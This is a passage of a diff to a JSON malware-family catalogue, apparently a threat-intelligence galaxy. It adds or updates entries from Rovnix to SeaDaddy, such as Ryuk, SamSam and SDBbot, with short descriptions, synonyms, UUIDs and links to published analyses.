"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", - "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html" + "https://securelist.com/oh-what-a-boot-iful-mornin/97365" ], "synonyms": [ "BkLoader", @@ -14719,11 +26944,12 @@ "value": "Rovnix" }, { - "description": "", + "description": "RoyalCli is a backdoor which appears to be an evolution of BS2005 and uses familiar encryption and encoding routines. The name RoyalCli was chosen by us due to a debugging path left in the binary. RoyalCli and BS2005 both communicate with the attacker's command and control (C2) through Internet Explorer (IE) by using the COM interface IWebBrowser2.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", "https://github.com/nccgroup/Royal_APT", + "https://www.secureworks.com/research/threat-profiles/bronze-palace", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], @@ -14733,11 +26959,12 @@ "value": "RoyalCli" }, { - "description": "", + "description": "RoyalDNS is a DNS based backdoor used by APT15 that persistences on a system through a service called 'Nwsapagent'.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", "https://github.com/nccgroup/Royal_APT", + "https://www.secureworks.com/research/threat-profiles/bronze-palace", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], @@ -14760,13 +26987,19 @@ "value": "Rozena" }, { - "description": "", + "description": "RTM Banker also known as Redaman was first blogged about in February 2017 by ESET. The malware is written in Delphi and shows some similarities (like process list) with Buhtrap. It uses a slightly modified version of RC4 to encrypt its strings, network data, configuration and modules, according to ESET.\r\n\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", - "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf", + "https://www.youtube.com/watch?v=YXnNO3TipvM", + "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/", + "http://www.peppermalware.com/2019/11/brief-analysis-of-redaman-banking.html", + "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/" + ], + "synonyms": [ + "Redaman" ], - "synonyms": [], "type": [] }, "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", @@ -14777,7 +27010,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos", - "https://boozallenmts.com/resources/news/rtpos-new-point-sale-malware-family-uncovered" + "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf" ], "synonyms": [], "type": [] @@ -14814,8 +27047,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat", - "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat" ], "synonyms": [], "type": [] @@ -14859,17 +27091,127 @@ "value": "Rustock" }, { - "description": "", + "description": "Ryuk is a ransomware which encrypts its victim's files and asks for a ransom via bitcoin to release the original files. It is has been observed being used to attack companies or professional environments. Cybersecurity experts figured out that Ryuk and Hermes ransomware shares pieces of codes. Hermes is commodity ransomware that has been observed for sale on dark-net forums and used by multiple threat actors. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk", - "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", + "https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/", + "https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/", + "https://community.riskiq.com/article/0bcefe76", + "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/", + "https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html", + "https://twitter.com/ffforward/status/1324281530026524672", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://twitter.com/anthomsec/status/1321865315513520128", + "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", + "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/", + "https://blog.reversinglabs.com/blog/hunting-for-ransomware", + "https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/", + "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", + "https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html", + "https://www.scythe.io/library/threatthursday-ryuk", + "https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html", + "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/", + "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/", + "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/", + "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/", + "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://twitter.com/IntelAdvanced/status/1353546534676258816", + "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", - "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html", - "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/", "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://github.com/scythe-io/community-threats/tree/master/Ryuk", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", + "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/", + "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", + "https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/", + "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf", + "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", + "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", + "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-ulrick", + "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/", + "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", + "https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP", + "https://www.youtube.com/watch?v=CgDtm05qApE", + "https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/", + "https://unit42.paloaltonetworks.com/ryuk-ransomware/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://twitter.com/Prosegur/status/1199732264386596864", + "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", + "https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders", "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/" + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.youtube.com/watch?v=BhjQ6zsCVSc", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456", + "https://blogs.quickheal.com/deep-dive-wakeup-lan-wol-implementation-ryuk/", + "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", + "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf", + "https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://twitter.com/SophosLabs/status/1321844306970251265", + "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", + "https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/", + "https://blog.cyberint.com/ryuk-crypto-ransomware", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + "https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/", + "https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/", + "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/", + "https://www.youtube.com/watch?v=Of_KjNG9DHc", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-deployed-two-weeks-after-trickbot-infection/", + "https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf", + "https://twitter.com/IntelAdvanced/status/1356114606780002308", + "https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/", + "https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc", + "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html", + "https://www.youtube.com/watch?v=7xxRunBP5XA", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" ], "synonyms": [], "type": [] @@ -14877,15 +27219,69 @@ "uuid": "62c79940-184e-4b8d-9237-35434bb79678", "value": "Ryuk" }, + { + "description": "Information Stealer that searches for sensitive documents and uploads its results to an FTP server. Skips files with known Ryuk extensions.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer", + "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/", + "https://twitter.com/VK_Intel/status/1171782155581689858" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0f0e5355-1dbf-4af4-aebf-88b08e6272a4", + "value": "Ryuk Stealer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sadogo", + "https://id-ransomware.blogspot.com/2020/04/sadogo-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "188528f1-1292-4aaa-b1e6-3fe0ab78ff81", + "value": "Sadogo Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.saefko", + "https://www.zscaler.com/blogs/research/saefko-new-multi-layered-rat" + ], + "synonyms": [], + "type": [] + }, + "uuid": "60124475-1c52-4108-81cf-7b9fa0f0d3bb", + "value": "Saefko" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.safenet", + "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-safe-a-targeted-threat.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d16f9dc6-290d-4174-8b47-a972cc52dac7", + "value": "SafeNet" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom", "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", - "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", "http://malware-traffic-analysis.net/2017/10/13/index.html", - "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/" + "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", + "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/", + "https://www.cert.pl/en/news/single/sage-2-0-analysis/" ], "synonyms": [ "Saga" @@ -14895,16 +27291,32 @@ "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", "value": "SAGE" }, + { + "description": "FireEye reports SaiGon as a variant of ISFB v3 (versions documented are tagged 3.50.132) that is more a generic backdoor than being focused on enabling banking fraud.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.saigon", + "https://www.fireeye.com/blog/threat-research/2020/01/saigon-mysterious-ursnif-fork.html", + "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "08817c1e-3a90-4c9b-b332-52ebe72669c5", + "value": "SaiGon" + }, { "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat", - "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", - "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", + "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/black-vine-cyberespionage-group-15-en.pdf", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", - "https://www.secureworks.com/research/sakula-malware-family" + "https://www.secureworks.com/research/sakula-malware-family", + "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", + "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99" ], "synonyms": [ "Sakurel" @@ -14919,9 +27331,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea", - "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf", + "https://research.checkpoint.com/deobfuscating-apt32-flow-graphs-with-cutter-and-radare2/", + "https://www.accenture.com/us-en/blogs/blogs-pond-loach-delivers-badcake-malware" + ], + "synonyms": [ + "BadCake" ], - "synonyms": [], "type": [] }, "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", @@ -14945,17 +27361,40 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", - "http://blog.talosintel.com/2016/03/samsam-ransomware.html", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", - "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/", - "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public", - "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", - "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.samo_rat", + "https://business.xunison.com/analysis-of-samorat/" ], "synonyms": [], "type": [] }, + "uuid": "e2db8349-7535-4748-96ac-a18985cf66b8", + "value": "SamoRAT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", + "https://www.secureworks.com/research/threat-profiles/gold-lowell", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "http://blog.talosintel.com/2016/03/samsam-ransomware.html", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/", + "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", + "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" + ], + "synonyms": [ + "Samas" + ], + "type": [] + }, "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", "value": "SamSam" }, @@ -14964,6 +27403,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny", + "https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" ], "synonyms": [ @@ -14979,7 +27419,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache", - "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html" + "https://blog.alyac.co.kr/m/2219", + "https://blog.reversinglabs.com/blog/catching-lateral-movement-in-internal-emails", + "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html", + "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf", + "https://blog.alyac.co.kr/2219" ], "synonyms": [], "type": [] @@ -14992,10 +27436,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust", + "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a", "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html" ], "synonyms": [ + "ENDCMD", "Hussarini" ], "type": [] @@ -15030,14 +27476,16 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", "https://www.sangfor.com/source/blog-network-security/1094.html", - "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", + "https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html", "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2", - "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", + "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html", + "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", "http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/", "https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/" ], "synonyms": [ + "5ss5c", "DBGer", "Lucky Ransomware" ], @@ -15051,6 +27499,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", + "https://blog.reversinglabs.com/blog/retread-ransomware", "https://www.cylance.com/threat-spotlight-satan-raas" ], "synonyms": [], @@ -15059,11 +27508,25 @@ "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", "value": "Satana" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla", + "https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "957f6c4a-c750-4ba3-820f-5a19d444a57a", + "value": "Satellite Turla" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" ], "synonyms": [], @@ -15086,6 +27549,39 @@ "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", "value": "ScanPOS" }, + { + "description": "Ransomware with ransomnote in Russian and encryption extension .scarab.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarabey", + "https://id-ransomware.blogspot.com/2017/12/scarabey-ransomware.html" + ], + "synonyms": [ + "MVP", + "Scarab", + "Scarab-Russian" + ], + "type": [] + }, + "uuid": "76d20f49-9367-4d36-95d2-7ef8ff55568d", + "value": "Scarabey" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarab_ransom", + "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "http://malware-traffic-analysis.net/2017/11/23/index.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694", + "value": "Scarab Ransomware" + }, { "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.", "meta": { @@ -15113,6 +27609,20 @@ "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", "value": "Scote" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.scranos", + "https://www.bitdefender.com/files/News/CaseStudies/study/271/Bitdefender-Whitepaper-Scranos-2.pdf", + "https://labs.bitdefender.com/2019/04/inside-scranos-a-cross-platform-rootkit-enabled-spyware-operation/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b5d90140-f307-402c-9d7f-9cdf21a7cb31", + "value": "Scranos" + }, { "description": "", "meta": { @@ -15130,15 +27640,53 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot", + "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", + "https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", + "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader", + "https://github.com/Tera0017/SDBbot-Unpacker", + "https://vblocalhost.com/uploads/VB2020-Jung.pdf", + "https://www.secureworks.com/research/threat-profiles/gold-tahoe" ], "synonyms": [], "type": [] }, + "uuid": "48bbf0b7-d8c3-4ddb-8498-cf8e72b210d8", + "value": "SDBbot" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + 